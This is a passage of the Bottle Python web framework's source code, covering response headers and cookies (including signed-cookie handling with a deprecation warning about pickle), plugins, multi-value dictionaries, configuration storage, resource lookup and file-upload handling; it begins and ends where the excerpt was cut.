[_hval(value)]\n\n    def get_header(self, name, default=None):\n        \"\"\" Return the value of a previously defined header. If there is no\n            header with that name, return a default value. \"\"\"\n        return self._headers.get(_hkey(name), [default])[-1]\n\n    def set_header(self, name, value):\n        \"\"\" Create a new response header, replacing any previously defined\n            headers with the same name. \"\"\"\n        self._headers[_hkey(name)] = [_hval(value)]\n\n    def add_header(self, name, value):\n        \"\"\" Add an additional response header, not removing duplicates. \"\"\"\n        self._headers.setdefault(_hkey(name), []).append(_hval(value))\n\n    def iter_headers(self):\n        \"\"\" Yield (header, value) tuples, skipping headers that are not\n            allowed with the current response status code. \"\"\"\n        return self.headerlist\n\n    def _wsgi_status_line(self):\n        \"\"\" WSGI conform status line (latin1-encodeable) \"\"\"\n        if py3k:\n            return self._status_line.encode('utf8').decode('latin1')\n        return self._status_line\n\n    @property\n    def headerlist(self):\n        \"\"\" WSGI conform list of (header, value) tuples. \"\"\"\n        out = []\n        headers = list(self._headers.items())\n        if 'Content-Type' not in self._headers:\n            headers.append(('Content-Type', [self.default_content_type]))\n        if self._status_code in self.bad_headers:\n            bad_headers = self.bad_headers[self._status_code]\n            headers = [h for h in headers if h[0] not in bad_headers]\n        out += [(name, val) for (name, vals) in headers for val in vals]\n        if self._cookies:\n            for c in self._cookies.values():\n                out.append(('Set-Cookie', _hval(c.OutputString())))\n        if py3k:\n            out = [(k, v.encode('utf8').decode('latin1')) for (k, v) in out]\n        return out\n\n    content_type = HeaderProperty('Content-Type')\n    content_length = HeaderProperty('Content-Length', reader=int, default=-1)\n    expires = HeaderProperty(\n        'Expires',\n        reader=lambda x: datetime.utcfromtimestamp(parse_date(x)),\n        writer=lambda x: http_date(x))\n\n    @property\n    def charset(self, default='UTF-8'):\n        \"\"\" Return the charset specified in the content-type header (default: utf8). \"\"\"\n        if 'charset=' in self.content_type:\n            return self.content_type.split('charset=')[-1].split(';')[0].strip()\n        return default\n\n    def set_cookie(self, name, value, secret=None, digestmod=hashlib.sha256, **options):\n        \"\"\" Create a new cookie or replace an old one. If the `secret` parameter is\n            set, create a `Signed Cookie` (described below).\n\n            :param name: the name of the cookie.\n            :param value: the value of the cookie.\n            :param secret: a signature key required for signed cookies.\n\n            Additionally, this method accepts all RFC 2109 attributes that are\n            supported by :class:`cookie.Morsel`, including:\n\n            :param maxage: maximum age in seconds. (default: None)\n            :param expires: a datetime object or UNIX timestamp. (default: None)\n            :param domain: the domain that is allowed to read the cookie.\n              (default: current domain)\n            :param path: limits the cookie to a given path (default: current path)\n            :param secure: limit the cookie to HTTPS connections (default: off).\n            :param httponly: prevents client-side javascript to read this cookie\n              (default: off, requires Python 2.6 or newer).\n            :param samesite: Control or disable third-party use for this cookie.\n              Possible values: `lax`, `strict` or `none` (default).\n\n            If neither `expires` nor `maxage` is set (default), the cookie will\n            expire at the end of the browser session (as soon as the browser\n            window is closed).\n\n            Signed cookies may store any pickle-able object and are\n            cryptographically signed to prevent manipulation. Keep in mind that\n            cookies are limited to 4kb in most browsers.\n\n            Warning: Pickle is a potentially dangerous format. If an attacker\n            gains access to the secret key, he could forge cookies that execute\n            code on server side if unpickled. Using pickle is discouraged and\n            support for it will be removed in later versions of bottle.\n\n            Warning: Signed cookies are not encrypted (the client can still see\n            the content) and not copy-protected (the client can restore an old\n            cookie). The main intention is to make pickling and unpickling\n            save, not to store secret information at client side.\n        \"\"\"\n        if not self._cookies:\n            self._cookies = SimpleCookie()\n\n        # Monkey-patch Cookie lib to support 'SameSite' parameter\n        # https://tools.ietf.org/html/draft-west-first-party-cookies-07#section-4.1\n        if py < (3, 8, 0):\n            Morsel._reserved.setdefault('samesite', 'SameSite')\n\n        if secret:\n            if not isinstance(value, basestring):\n                depr(0, 13, \"Pickling of arbitrary objects into cookies is \"\n                            \"deprecated.\", \"Only store strings in cookies. \"\n                            \"JSON strings are fine, too.\")\n            encoded = base64.b64encode(pickle.dumps([name, value], -1))\n            sig = base64.b64encode(hmac.new(tob(secret), encoded,\n                                            digestmod=digestmod).digest())\n            value = touni(tob('!') + sig + tob('?') + encoded)\n        elif not isinstance(value, basestring):\n            raise TypeError('Secret key required for non-string cookies.')\n\n        # Cookie size plus options must not exceed 4kb.\n        if len(name) + len(value) > 3800:\n            raise ValueError('Content does not fit into a cookie.')\n\n        self._cookies[name] = value\n\n        for key, value in options.items():\n            if key in ('max_age', 'maxage'): # 'maxage' variant added in 0.13\n                key = 'max-age'\n                if isinstance(value, timedelta):\n                    value = value.seconds + value.days * 24 * 3600\n            if key == 'expires':\n                value = http_date(value)\n            if key in ('same_site', 'samesite'): # 'samesite' variant added in 0.13\n                key, value = 'samesite', (value or \"none\").lower()\n                if value not in ('lax', 'strict', 'none'):\n                    raise CookieError(\"Invalid value for SameSite\")\n            if key in ('secure', 'httponly') and not value:\n                continue\n            self._cookies[name][key] = value\n\n    def delete_cookie(self, key, **kwargs):\n        \"\"\" Delete a cookie. Be sure to use the same `domain` and `path`\n            settings as used to create the cookie. \"\"\"\n        kwargs['max_age'] = -1\n        kwargs['expires'] = 0\n        self.set_cookie(key, '', **kwargs)\n\n    def __repr__(self):\n        out = ''\n        for name, value in self.headerlist:\n            out += '%s: %s\\n' % (name.title(), value.strip())\n        return out\n\n\ndef _local_property():\n    ls = threading.local()\n\n    def fget(_):\n        try:\n            return ls.var\n        except AttributeError:\n            raise RuntimeError(\"Request context not initialized.\")\n\n    def fset(_, value):\n        ls.var = value\n\n    def fdel(_):\n        del ls.var\n\n    return property(fget, fset, fdel, 'Thread-local property')\n\n\nclass LocalRequest(BaseRequest):\n    \"\"\" A thread-local subclass of :class:`BaseRequest` with a different\n        set of attributes for each thread. There is usually only one global\n        instance of this class (:data:`request`). If accessed during a\n        request/response cycle, this instance always refers to the *current*\n        request (even on a multithreaded server). \"\"\"\n    bind = BaseRequest.__init__\n    environ = _local_property()\n\n\nclass LocalResponse(BaseResponse):\n    \"\"\" A thread-local subclass of :class:`BaseResponse` with a different\n        set of attributes for each thread. There is usually only one global\n        instance of this class (:data:`response`). Its attributes are used\n        to build the HTTP response at the end of the request/response cycle.\n    \"\"\"\n    bind = BaseResponse.__init__\n    _status_line = _local_property()\n    _status_code = _local_property()\n    _cookies = _local_property()\n    _headers = _local_property()\n    body = _local_property()\n\n\nRequest = BaseRequest\nResponse = BaseResponse\n\n\nclass HTTPResponse(Response, BottleException):\n    def __init__(self, body='', status=None, headers=None, **more_headers):\n        super(HTTPResponse, self).__init__(body, status, headers, **more_headers)\n\n    def apply(self, other):\n        other._status_code = self._status_code\n        other._status_line = self._status_line\n        other._headers = self._headers\n        other._cookies = self._cookies\n        other.body = self.body\n\n\nclass HTTPError(HTTPResponse):\n    default_status = 500\n\n    def __init__(self,\n                 status=None,\n                 body=None,\n                 exception=None,\n                 traceback=None, **more_headers):\n        self.exception = exception\n        self.traceback = traceback\n        super(HTTPError, self).__init__(body, status, **more_headers)\n\n###############################################################################\n# Plugins ######################################################################\n###############################################################################\n\n\nclass PluginError(BottleException):\n    pass\n\n\nclass JSONPlugin(object):\n    name = 'json'\n    api = 2\n\n    def __init__(self, json_dumps=json_dumps):\n        self.json_dumps = json_dumps\n\n    def setup(self, app):\n        app.config._define('json.enable', default=True, validate=bool,\n                          help=\"Enable or disable automatic dict->json filter.\")\n        app.config._define('json.ascii', default=False, validate=bool,\n                          help=\"Use only 7-bit ASCII characters in output.\")\n        app.config._define('json.indent', default=True, validate=bool,\n                          help=\"Add whitespace to make json more readable.\")\n        app.config._define('json.dump_func', default=None,\n                          help=\"If defined, use this function to transform\"\n                               \" dict into json. The other options no longer\"\n                               \" apply.\")\n\n    def apply(self, callback, route):\n        dumps = self.json_dumps\n        if not self.json_dumps: return callback\n\n        def wrapper(*a, **ka):\n            try:\n                rv = callback(*a, **ka)\n            except HTTPResponse as resp:\n                rv = resp\n\n            if isinstance(rv, dict):\n                #Attempt to serialize, raises exception on failure\n                json_response = dumps(rv)\n                #Set content type only if serialization successful\n                response.content_type = 'application/json'\n                return json_response\n            elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):\n                rv.body = dumps(rv.body)\n                rv.content_type = 'application/json'\n            return rv\n\n        return wrapper\n\n\nclass TemplatePlugin(object):\n    \"\"\" This plugin applies the :func:`view` decorator to all routes with a\n        `template` config parameter. If the parameter is a tuple, the second\n        element must be a dict with additional options (e.g. `template_engine`)\n        or default variables for the template. \"\"\"\n    name = 'template'\n    api = 2\n\n    def setup(self, app):\n        app.tpl = self\n\n    def apply(self, callback, route):\n        conf = route.config.get('template')\n        if isinstance(conf, (tuple, list)) and len(conf) == 2:\n            return view(conf[0], **conf[1])(callback)\n        elif isinstance(conf, str):\n            return view(conf)(callback)\n        else:\n            return callback\n\n\n#: Not a plugin, but part of the plugin API. TODO: Find a better place.\nclass _ImportRedirect(object):\n    def __init__(self, name, impmask):\n        \"\"\" Create a virtual package that redirects imports (see PEP 302). \"\"\"\n        self.name = name\n        self.impmask = impmask\n        self.module = sys.modules.setdefault(name, imp.new_module(name))\n        self.module.__dict__.update({\n            '__file__': __file__,\n            '__path__': [],\n            '__all__': [],\n            '__loader__': self\n        })\n        sys.meta_path.append(self)\n\n    def find_module(self, fullname, path=None):\n        if '.' not in fullname: return\n        packname = fullname.rsplit('.', 1)[0]\n        if packname != self.name: return\n        return self\n\n    def load_module(self, fullname):\n        if fullname in sys.modules: return sys.modules[fullname]\n        modname = fullname.rsplit('.', 1)[1]\n        realname = self.impmask % modname\n        __import__(realname)\n        module = sys.modules[fullname] = sys.modules[realname]\n        setattr(self.module, modname, module)\n        module.__loader__ = self\n        return module\n\n###############################################################################\n# Common Utilities #############################################################\n###############################################################################\n\n\nclass MultiDict(DictMixin):\n    \"\"\" This dict stores multiple values per key, but behaves exactly like a\n        normal dict in that it returns only the newest value for any given key.\n        There are special methods available to access the full list of values.\n    \"\"\"\n\n    def __init__(self, *a, **k):\n        self.dict = dict((k, [v]) for (k, v) in dict(*a, **k).items())\n\n    def __len__(self):\n        return len(self.dict)\n\n    def __iter__(self):\n        return iter(self.dict)\n\n    def __contains__(self, key):\n        return key in self.dict\n\n    def __delitem__(self, key):\n        del self.dict[key]\n\n    def __getitem__(self, key):\n        return self.dict[key][-1]\n\n    def __setitem__(self, key, value):\n        self.append(key, value)\n\n    def keys(self):\n        return self.dict.keys()\n\n    if py3k:\n\n        def values(self):\n            return (v[-1] for v in self.dict.values())\n\n        def items(self):\n            return ((k, v[-1]) for k, v in self.dict.items())\n\n        def allitems(self):\n            return ((k, v) for k, vl in self.dict.items() for v in vl)\n\n        iterkeys = keys\n        itervalues = values\n        iteritems = items\n        iterallitems = allitems\n\n    else:\n\n        def values(self):\n            return [v[-1] for v in self.dict.values()]\n\n        def items(self):\n            return [(k, v[-1]) for k, v in self.dict.items()]\n\n        def iterkeys(self):\n            return self.dict.iterkeys()\n\n        def itervalues(self):\n            return (v[-1] for v in self.dict.itervalues())\n\n        def iteritems(self):\n            return ((k, v[-1]) for k, v in self.dict.iteritems())\n\n        def iterallitems(self):\n            return ((k, v) for k, vl in self.dict.iteritems() for v in vl)\n\n        def allitems(self):\n            return [(k, v) for k, vl in self.dict.iteritems() for v in vl]\n\n    def get(self, key, default=None, index=-1, type=None):\n        \"\"\" Return the most recent value for a key.\n\n            :param default: The default value to be returned if the key is not\n                   present or the type conversion fails.\n            :param index: An index for the list of available values.\n            :param type: If defined, this callable is used to cast the value\n                    into a specific type. Exception are suppressed and result in\n                    the default value to be returned.\n        \"\"\"\n        try:\n            val = self.dict[key][index]\n            return type(val) if type else val\n        except Exception:\n            pass\n        return default\n\n    def append(self, key, value):\n        \"\"\" Add a new value to the list of values for this key. \"\"\"\n        self.dict.setdefault(key, []).append(value)\n\n    def replace(self, key, value):\n        \"\"\" Replace the list of values with a single value. \"\"\"\n        self.dict[key] = [value]\n\n    def getall(self, key):\n        \"\"\" Return a (possibly empty) list of values for a key. \"\"\"\n        return self.dict.get(key) or []\n\n    #: Aliases for WTForms to mimic other multi-dict APIs (Django)\n    getone = get\n    getlist = getall\n\n\nclass FormsDict(MultiDict):\n    \"\"\" This :class:`MultiDict` subclass is used to store request form data.\n        Additionally to the normal dict-like item access methods (which return\n        unmodified data as native strings), this container also supports\n        attribute-like access to its values. Attributes are automatically de-\n        or recoded to match :attr:`input_encoding` (default: 'utf8'). Missing\n        attributes default to an empty string. \"\"\"\n\n    #: Encoding used for attribute values.\n    input_encoding = 'utf8'\n    #: If true (default), unicode strings are first encoded with `latin1`\n    #: and then decoded to match :attr:`input_encoding`.\n    recode_unicode = True\n\n    def _fix(self, s, encoding=None):\n        if isinstance(s, unicode) and self.recode_unicode:  # Python 3 WSGI\n            return s.encode('latin1').decode(encoding or self.input_encoding)\n        elif isinstance(s, bytes):  # Python 2 WSGI\n            return s.decode(encoding or self.input_encoding)\n        else:\n            return s\n\n    def decode(self, encoding=None):\n        \"\"\" Returns a copy with all keys and values de- or recoded to match\n            :attr:`input_encoding`. Some libraries (e.g. WTForms) want a\n            unicode dictionary. \"\"\"\n        copy = FormsDict()\n        enc = copy.input_encoding = encoding or self.input_encoding\n        copy.recode_unicode = False\n        for key, value in self.allitems():\n            copy.append(self._fix(key, enc), self._fix(value, enc))\n        return copy\n\n    def getunicode(self, name, default=None, encoding=None):\n        \"\"\" Return the value as a unicode string, or the default. \"\"\"\n        try:\n            return self._fix(self[name], encoding)\n        except (UnicodeError, KeyError):\n            return default\n\n    def __getattr__(self, name, default=unicode()):\n        # Without this guard, pickle generates a cryptic TypeError:\n        if name.startswith('__') and name.endswith('__'):\n            return super(FormsDict, self).__getattr__(name)\n        return self.getunicode(name, default=default)\n\nclass HeaderDict(MultiDict):\n    \"\"\" A case-insensitive version of :class:`MultiDict` that defaults to\n        replace the old value instead of appending it. \"\"\"\n\n    def __init__(self, *a, **ka):\n        self.dict = {}\n        if a or ka: self.update(*a, **ka)\n\n    def __contains__(self, key):\n        return _hkey(key) in self.dict\n\n    def __delitem__(self, key):\n        del self.dict[_hkey(key)]\n\n    def __getitem__(self, key):\n        return self.dict[_hkey(key)][-1]\n\n    def __setitem__(self, key, value):\n        self.dict[_hkey(key)] = [_hval(value)]\n\n    def append(self, key, value):\n        self.dict.setdefault(_hkey(key), []).append(_hval(value))\n\n    def replace(self, key, value):\n        self.dict[_hkey(key)] = [_hval(value)]\n\n    def getall(self, key):\n        return self.dict.get(_hkey(key)) or []\n\n    def get(self, key, default=None, index=-1):\n        return MultiDict.get(self, _hkey(key), default, index)\n\n    def filter(self, names):\n        for name in (_hkey(n) for n in names):\n            if name in self.dict:\n                del self.dict[name]\n\n\nclass WSGIHeaderDict(DictMixin):\n    \"\"\" This dict-like class wraps a WSGI environ dict and provides convenient\n        access to HTTP_* fields. Keys and values are native strings\n        (2.x bytes or 3.x unicode) and keys are case-insensitive. If the WSGI\n        environment contains non-native string values, these are de- or encoded\n        using a lossless 'latin1' character set.\n\n        The API will remain stable even on changes to the relevant PEPs.\n        Currently PEP 333, 444 and 3333 are supported. (PEP 444 is the only one\n        that uses non-native strings.)\n    \"\"\"\n    #: List of keys that do not have a ``HTTP_`` prefix.\n    cgikeys = ('CONTENT_TYPE', 'CONTENT_LENGTH')\n\n    def __init__(self, environ):\n        self.environ = environ\n\n    def _ekey(self, key):\n        \"\"\" Translate header field name to CGI/WSGI environ key. \"\"\"\n        key = key.replace('-', '_').upper()\n        if key in self.cgikeys:\n            return key\n        return 'HTTP_' + key\n\n    def raw(self, key, default=None):\n        \"\"\" Return the header value as is (may be bytes or unicode). \"\"\"\n        return self.environ.get(self._ekey(key), default)\n\n    def __getitem__(self, key):\n        val = self.environ[self._ekey(key)]\n        if py3k:\n            if isinstance(val, unicode):\n                val = val.encode('latin1').decode('utf8')\n            else:\n                val = val.decode('utf8')\n        return val\n\n    def __setitem__(self, key, value):\n        raise TypeError(\"%s is read-only.\" % self.__class__)\n\n    def __delitem__(self, key):\n        raise TypeError(\"%s is read-only.\" % self.__class__)\n\n    def __iter__(self):\n        for key in self.environ:\n            if key[:5] == 'HTTP_':\n                yield _hkey(key[5:])\n            elif key in self.cgikeys:\n                yield _hkey(key)\n\n    def keys(self):\n        return [x for x in self]\n\n    def __len__(self):\n        return len(self.keys())\n\n    def __contains__(self, key):\n        return self._ekey(key) in self.environ\n\n_UNSET = object()\n\nclass ConfigDict(dict):\n    \"\"\" A dict-like configuration storage with additional support for\n        namespaces, validators, meta-data, overlays and more.\n\n        This dict-like class is heavily optimized for read access. All read-only\n        methods as well as item access should be as fast as the built-in dict.\n    \"\"\"\n\n    __slots__ = ('_meta', '_change_listener', '_overlays', '_virtual_keys', '_source', '__weakref__')\n\n    def __init__(self):\n        self._meta = {}\n        self._change_listener = []\n        #: Weak references of overlays that need to be kept in sync.\n        self._overlays = []\n        #: Config that is the source for this overlay.\n        self._source = None\n        #: Keys of values copied from the source (values we do not own)\n        self._virtual_keys = set()\n\n    def load_module(self, path, squash=True):\n        \"\"\"Load values from a Python module.\n\n           Example modue ``config.py``::\n\n                DEBUG = True\n                SQLITE = {\n                    \"db\": \":memory:\"\n                }\n\n\n           >>> c = ConfigDict()\n           >>> c.load_module('config')\n           {DEBUG: True, 'SQLITE.DB': 'memory'}\n           >>> c.load_module(\"config\", False)\n           {'DEBUG': True, 'SQLITE': {'DB': 'memory'}}\n\n           :param squash: If true (default), dictionary values are assumed to\n                          represent namespaces (see :meth:`load_dict`).\n        \"\"\"\n        config_obj = load(path)\n        obj = {key: getattr(config_obj, key) for key in dir(config_obj)\n               if key.isupper()}\n\n        if squash:\n            self.load_dict(obj)\n        else:\n            self.update(obj)\n        return self\n\n    def load_config(self, filename, **options):\n        \"\"\" Load values from an ``*.ini`` style config file.\n\n            A configuration file consists of sections, each led by a\n            ``[section]`` header, followed by key/value entries separated by\n            either ``=`` or ``:``. Section names and keys are case-insensitive.\n            Leading and trailing whitespace is removed from keys and values.\n            Values can be omitted, in which case the key/value delimiter may\n            also be left out. Values can also span multiple lines, as long as\n            they are indented deeper than the first line of the value. Commands\n            are prefixed by ``#`` or ``;`` and may only appear on their own on\n            an otherwise empty line.\n\n            Both section and key names may contain dots (``.``) as namespace\n            separators. The actual configuration parameter name is constructed\n            by joining section name and key name together and converting to\n            lower case.\n\n            The special sections ``bottle`` and ``ROOT`` refer to the root\n            namespace and the ``DEFAULT`` section defines default values for all\n            other sections.\n\n            With Python 3, extended string interpolation is enabled.\n\n            :param filename: The path of a config file, or a list of paths.\n            :param options: All keyword parameters are passed to the underlying\n                :class:`python:configparser.ConfigParser` constructor call.\n\n        \"\"\"\n        options.setdefault('allow_no_value', True)\n        if py3k:\n            options.setdefault('interpolation',\n                               configparser.ExtendedInterpolation())\n        conf = configparser.ConfigParser(**options)\n        conf.read(filename)\n        for section in conf.sections():\n            for key in conf.options(section):\n                value = conf.get(section, key)\n                if section not in ('bottle', 'ROOT'):\n                    key = section + '.' + key\n                self[key.lower()] = value\n        return self\n\n    def load_dict(self, source, namespace=''):\n        \"\"\" Load values from a dictionary structure. Nesting can be used to\n            represent namespaces.\n\n            >>> c = ConfigDict()\n            >>> c.load_dict({'some': {'namespace': {'key': 'value'} } })\n            {'some.namespace.key': 'value'}\n        \"\"\"\n        for key, value in source.items():\n            if isinstance(key, basestring):\n                nskey = (namespace + '.' + key).strip('.')\n                if isinstance(value, dict):\n                    self.load_dict(value, namespace=nskey)\n                else:\n                    self[nskey] = value\n            else:\n                raise TypeError('Key has type %r (not a string)' % type(key))\n        return self\n\n    def update(self, *a, **ka):\n        \"\"\" If the first parameter is a string, all keys are prefixed with this\n            namespace. Apart from that it works just as the usual dict.update().\n\n            >>> c = ConfigDict()\n            >>> c.update('some.namespace', key='value')\n        \"\"\"\n        prefix = ''\n        if a and isinstance(a[0], basestring):\n            prefix = a[0].strip('.') + '.'\n            a = a[1:]\n        for key, value in dict(*a, **ka).items():\n            self[prefix + key] = value\n\n    def setdefault(self, key, value):\n        if key not in self:\n            self[key] = value\n        return self[key]\n\n    def __setitem__(self, key, value):\n        if not isinstance(key, basestring):\n            raise TypeError('Key has type %r (not a string)' % type(key))\n\n        self._virtual_keys.discard(key)\n\n        value = self.meta_get(key, 'filter', lambda x: x)(value)\n        if key in self and self[key] is value:\n            return\n\n        self._on_change(key, value)\n        dict.__setitem__(self, key, value)\n\n        for overlay in self._iter_overlays():\n            overlay._set_virtual(key, value)\n\n    def __delitem__(self, key):\n        if key not in self:\n            raise KeyError(key)\n        if key in self._virtual_keys:\n            raise KeyError(\"Virtual keys cannot be deleted: %s\" % key)\n\n        if self._source and key in self._source:\n            # Not virtual, but present in source -> Restore virtual value\n            dict.__delitem__(self, key)\n            self._set_virtual(key, self._source[key])\n        else:  # not virtual, not present in source. This is OUR value\n            self._on_change(key, None)\n            dict.__delitem__(self, key)\n            for overlay in self._iter_overlays():\n                overlay._delete_virtual(key)\n\n    def _set_virtual(self, key, value):\n        \"\"\" Recursively set or update virtual keys. Do nothing if non-virtual\n            value is present. \"\"\"\n        if key in self and key not in self._virtual_keys:\n            return  # Do nothing for non-virtual keys.\n\n        self._virtual_keys.add(key)\n        if key in self and self[key] is not value:\n            self._on_change(key, value)\n        dict.__setitem__(self, key, value)\n        for overlay in self._iter_overlays():\n            overlay._set_virtual(key, value)\n\n    def _delete_virtual(self, key):\n        \"\"\" Recursively delete virtual entry. Do nothing if key is not virtual.\n        \"\"\"\n        if key not in self._virtual_keys:\n            return  # Do nothing for non-virtual keys.\n\n        if key in self:\n            self._on_change(key, None)\n        dict.__delitem__(self, key)\n        self._virtual_keys.discard(key)\n        for overlay in self._iter_overlays():\n            overlay._delete_virtual(key)\n\n    def _on_change(self, key, value):\n        for cb in self._change_listener:\n            if cb(self, key, value):\n                return True\n\n    def _add_change_listener(self, func):\n        self._change_listener.append(func)\n        return func\n\n    def meta_get(self, key, metafield, default=None):\n        \"\"\" Return the value of a meta field for a key. \"\"\"\n        return self._meta.get(key, {}).get(metafield, default)\n\n    def meta_set(self, key, metafield, value):\n        \"\"\" Set the meta field for a key to a new value. \"\"\"\n        self._meta.setdefault(key, {})[metafield] = value\n\n    def meta_list(self, key):\n        \"\"\" Return an iterable of meta field names defined for a key. \"\"\"\n        return self._meta.get(key, {}).keys()\n\n    def _define(self, key, default=_UNSET, help=_UNSET, validate=_UNSET):\n        \"\"\" (Unstable) Shortcut for plugins to define own config parameters. \"\"\"\n        if default is not _UNSET:\n            self.setdefault(key, default)\n        if help is not _UNSET:\n            self.meta_set(key, 'help', help)\n        if validate is not _UNSET:\n            self.meta_set(key, 'validate', validate)\n\n    def _iter_overlays(self):\n        for ref in self._overlays:\n            overlay = ref()\n            if overlay is not None:\n                yield overlay\n\n    def _make_overlay(self):\n        \"\"\" (Unstable) Create a new overlay that acts like a chained map: Values\n            missing in the overlay are copied from the source map. Both maps\n            share the same meta entries.\n\n            Entries that were copied from the source are called 'virtual'. You\n            can not delete virtual keys, but overwrite them, which turns them\n            into non-virtual entries. Setting keys on an overlay never affects\n            its source, but may affect any number of child overlays.\n\n            Other than collections.ChainMap or most other implementations, this\n            approach does not resolve missing keys on demand, but instead\n            actively copies all values from the source to the overlay and keeps\n            track of virtual and non-virtual keys internally. This removes any\n            lookup-overhead. Read-access is as fast as a build-in dict for both\n            virtual and non-virtual keys.\n\n            Changes are propagated recursively and depth-first. A failing\n            on-change handler in an overlay stops the propagation of virtual\n            values and may result in an partly updated tree. Take extra care\n            here and make sure that on-change handlers never fail.\n\n            Used by Route.config\n        \"\"\"\n        # Cleanup dead references\n        self._overlays[:] = [ref for ref in self._overlays if ref() is not None]\n\n        overlay = ConfigDict()\n        overlay._meta = self._meta\n        overlay._source = self\n        self._overlays.append(weakref.ref(overlay))\n        for key in self:\n            overlay._set_virtual(key, self[key])\n        return overlay\n\n\n\n\nclass AppStack(list):\n    \"\"\" A stack-like list. Calling it returns the head of the stack. \"\"\"\n\n    def __call__(self):\n        \"\"\" Return the current default application. \"\"\"\n        return self.default\n\n    def push(self, value=None):\n        \"\"\" Add a new :class:`Bottle` instance to the stack \"\"\"\n        if not isinstance(value, Bottle):\n            value = Bottle()\n        self.append(value)\n        return value\n    new_app = push\n\n    @property\n    def default(self):\n        try:\n            return self[-1]\n        except IndexError:\n            return self.push()\n\n\nclass WSGIFileWrapper(object):\n    def __init__(self, fp, buffer_size=1024 * 64):\n        self.fp, self.buffer_size = fp, buffer_size\n        for attr in 'fileno', 'close', 'read', 'readlines', 'tell', 'seek':\n            if hasattr(fp, attr): setattr(self, attr, getattr(fp, attr))\n\n    def __iter__(self):\n        buff, read = self.buffer_size, self.read\n        part = read(buff)\n        while part:\n            yield part\n            part = read(buff)\n\n\nclass _closeiter(object):\n    \"\"\" This only exists to be able to attach a .close method to iterators that\n        do not support attribute assignment (most of itertools). \"\"\"\n\n    def __init__(self, iterator, close=None):\n        self.iterator = iterator\n        self.close_callbacks = makelist(close)\n\n    def __iter__(self):\n        return iter(self.iterator)\n\n    def close(self):\n        for func in self.close_callbacks:\n            func()\n\n\nclass ResourceManager(object):\n    \"\"\" This class manages a list of search paths and helps to find and open\n        application-bound resources (files).\n\n        :param base: default value for :meth:`add_path` calls.\n        :param opener: callable used to open resources.\n        :param cachemode: controls which lookups are cached. One of 'all',\n                         'found' or 'none'.\n    \"\"\"\n\n    def __init__(self, base='./', opener=open, cachemode='all'):\n        self.opener = opener\n        self.base = base\n        self.cachemode = cachemode\n\n        #: A list of search paths. See :meth:`add_path` for details.\n        self.path = []\n        #: A cache for resolved paths. ``res.cache.clear()`` clears the cache.\n        self.cache = {}\n\n    def add_path(self, path, base=None, index=None, create=False):\n        \"\"\" Add a new path to the list of search paths. Return False if the\n            path does not exist.\n\n            :param path: The new search path. Relative paths are turned into\n                an absolute and normalized form. If the path looks like a file\n                (not ending in `/`), the filename is stripped off.\n            :param base: Path used to absolutize relative search paths.\n                Defaults to :attr:`base` which defaults to ``os.getcwd()``.\n            :param index: Position within the list of search paths. Defaults\n                to last index (appends to the list).\n\n            The `base` parameter makes it easy to reference files installed\n            along with a python module or package::\n\n                res.add_path('./resources/', __file__)\n        \"\"\"\n        base = os.path.abspath(os.path.dirname(base or self.base))\n        path = os.path.abspath(os.path.join(base, os.path.dirname(path)))\n        path += os.sep\n        if path in self.path:\n            self.path.remove(path)\n        if create and not os.path.isdir(path):\n            os.makedirs(path)\n        if index is None:\n            self.path.append(path)\n        else:\n            self.path.insert(index, path)\n        self.cache.clear()\n        return os.path.exists(path)\n\n    def __iter__(self):\n        \"\"\" Iterate over all existing files in all registered paths. \"\"\"\n        search = self.path[:]\n        while search:\n            path = search.pop()\n            if not os.path.isdir(path): continue\n            for name in os.listdir(path):\n                full = os.path.join(path, name)\n                if os.path.isdir(full): search.append(full)\n                else: yield full\n\n    def lookup(self, name):\n        \"\"\" Search for a resource and return an absolute file path, or `None`.\n\n            The :attr:`path` list is searched in order. The first match is\n            returned. Symlinks are followed. The result is cached to speed up\n            future lookups. \"\"\"\n        if name not in self.cache or DEBUG:\n            for path in self.path:\n                fpath = os.path.join(path, name)\n                if os.path.isfile(fpath):\n                    if self.cachemode in ('all', 'found'):\n                        self.cache[name] = fpath\n                    return fpath\n            if self.cachemode == 'all':\n                self.cache[name] = None\n        return self.cache[name]\n\n    def open(self, name, mode='r', *args, **kwargs):\n        \"\"\" Find a resource and return a file object, or raise IOError. \"\"\"\n        fname = self.lookup(name)\n        if not fname: raise IOError(\"Resource %r not found.\" % name)\n        return self.opener(fname, mode=mode, *args, **kwargs)\n\n\nclass FileUpload(object):\n    def __init__(self, fileobj, name, filename, headers=None):\n        \"\"\" Wrapper for file uploads. \"\"\"\n        #: Open file(-like) object (BytesIO buffer or temporary file)\n        self.file = fileobj\n        #: Name of the upload form field\n        self.name = name\n        #: Raw filename as sent by the client (may contain unsafe characters)\n        self.raw_filename = filename\n        #: A :class:`HeaderDict` with additional headers (e.g. content-type)\n        self.headers = HeaderDict(headers) if headers else HeaderDict()\n\n    content_type = HeaderProperty('Content-Type')\n    content_length = HeaderProperty('Content-Length', reader=int, default=-1)\n\n    def get_header(self, name, default=None):\n        \"\"\" Return the value of a header within the multipart part. \"\"\"\n        return self.headers.get(name, default)\n\n    @cached_property\n    def filename(self):\n        \"\"\" Name of the file on the client file system, but normalized to ensure\n            file system compatibility. An empty filename is returned as 'empty'.\n\n            Only ASCII letters, digits, dashes, underscores and dots are\n            allowed in the final filename. Accents are removed, if possible.\n            Whitespace is replaced by a single dash. Leading or tailing dots\n            or dashes are removed. The filename is limited to 255 characters.\n        \"\"\"\n        fname = self.raw_filename\n        if not isinstance(fname, unicode):\n            fname = fname.decode('utf8', 'ignore')\n        fname = normalize('NFKD', fname)\n        fname = fname.encode('ASCII', 'ignore').decode('ASCII')\n        fname = os.path.basename(fname.replace('\\\\', os.path.sep))\n        fname = re.sub(r'[^a-zA-Z0-9-_.\\s]', '', fname).strip()\n        fname = re.sub(r'[-\\s]+', '-', fname).strip('.-')\n        return fname[:255] or 'empty'\n\n    def _copy_file(self, fp, chunk_size=2 ** 16):\n        read, write, offset = self.file.read, fp.write, self.file.tell()\n        while 1:\n            buf = read(chunk_size)\n            if not buf: break\n            write(buf)\n        self.file.seek(offset)\n\n    def save(self, destination, overwrite=False, chunk_size=2 ** 16):\n        \"\"\" Save file to disk or copy its content to an open file(-like) object.\n            If *destination* is a directory, :attr:`filename` is added to the\n            path. Existing files are not overwritten by default (IOError).\n\n            :param destination: File path, directory or file(-like) object.\n            :param overwrite: If True, replace existing files. (default: False)\n            :param chunk_size: Bytes to read at a time. (default: 64kb)\n        \"\"\"\n        if isinstance(destination, basestring):  # Except file-likes here\n            if os.path.isdir(destination):\n                destination = os.path.join(destination, self.filename)\n            if not overwrite and os.path.exists(destination):\n                raise 